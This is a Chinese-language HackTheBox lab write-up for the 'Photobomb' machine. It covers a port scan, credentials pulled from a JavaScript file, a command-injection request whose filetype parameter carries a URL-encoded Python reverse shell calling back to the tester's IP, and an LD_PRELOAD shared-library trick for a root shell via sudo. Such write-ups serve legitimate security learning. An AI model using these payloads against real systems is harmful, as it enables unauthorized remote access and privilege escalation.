HTB靶机:Photobomb

靶机信息:

这台靶机网上有大佬写出现成的exp,我这属于逆向大佬的exp,复盘做的,通过大佬的exp很快啊,啪,20分钟就让我pwn掉这台机器。

image-20221014133933000

信息收集

端口扫描:

rustscan -a 10.10.11.182 -- -sC -sV -oN namp
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCwlzrcH3g6+RJ9JSdH4fFJPibAIpAZXAl7vCJA+98jmlaLCsANWQXth3UsQ+TCEf9YydmNXO2QAIocVR8y1NUEYBlN2xG4/7txjoXr9QShFwd10HNbULQyrGzPaFEN2O/7R90uP6lxQIDsoKJu2Ihs/4YFit79oSsCPMDPn8XS1fX/BRRhz1BDqKlLPdRIzvbkauo6QEhOiaOG1pxqOj50JVWO3XNpnzPxB01fo1GiaE4q5laGbktQagtqhz87SX7vWBwJXXKA/IennJIBPcyD1G6YUK0k6lDow+OUdXlmoxw+n370Knl6PYxyDwuDnvkPabPhkCnSvlgGKkjxvqks9axnQYxkieDqIgOmIrMheEqF6GXO5zz6WtN62UAIKAgxRPgIW0SjRw2sWBnT9GnLag74cmhpGaIoWunklT2c94J7t+kpLAcsES6+yFp9Wzbk1vsqThAss0BkVsyxzvL0U9HvcyyDKLGFlFPbsiFH7br/PuxGbqdO9Jbrrs9nx60=
|   256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBrVE9flXamwUY+wiBc9IhaQJRE40YpDsbOGPxLWCKKjNAnSBYA9CPsdgZhoV8rtORq/4n+SO0T80x1wW3g19Ew=
|   256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEp8nHKD5peyVy3X3MsJCmH/HIUvJT+MONekDg5xYZ6D
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80:

添加hosts后访问,发现需要点击后需要登录。通过查看流量包,从js文件中发现了账号密码:pH0t0:b0Mb!

image-20221014150804918

经过验证发现fileype标签存在命令执行漏洞

image-20221014151256161

ps:这里参考的网上搜索到payload:https://github.com/GOATFUCK69/HackTheBox-PhotoBomb-script/blob/main/c.py,我这里直接将payload拿出来url encode后重放。

photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg;python3%20-c%20'import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.14%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/bash%22)'&dimensions=3000x2000

image-20221014151814022

提权

这里获取shell就是user的权限,通过sudo -l可以很直接看到提权点,普通的环境变量劫持参考:

https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-command-suid-binary-without-command-path

这里我直接模仿这个:

image-20221014152402074

//shell.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/usr/bin/bash");
}
#本地编译后上传到服务器
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
#服务器执行
sudo LD_PRELOAD=/home/wizard/shell.so /opt/cleanup.sh

image-20221014153400917

总结

这个靶机在github上泄露出来的payload,让我省去漏洞测试,不过看截取到的报文,也会怀疑到命令执行上。提权这块很轻松。算是一个简单的靶机。

image-20221014112427471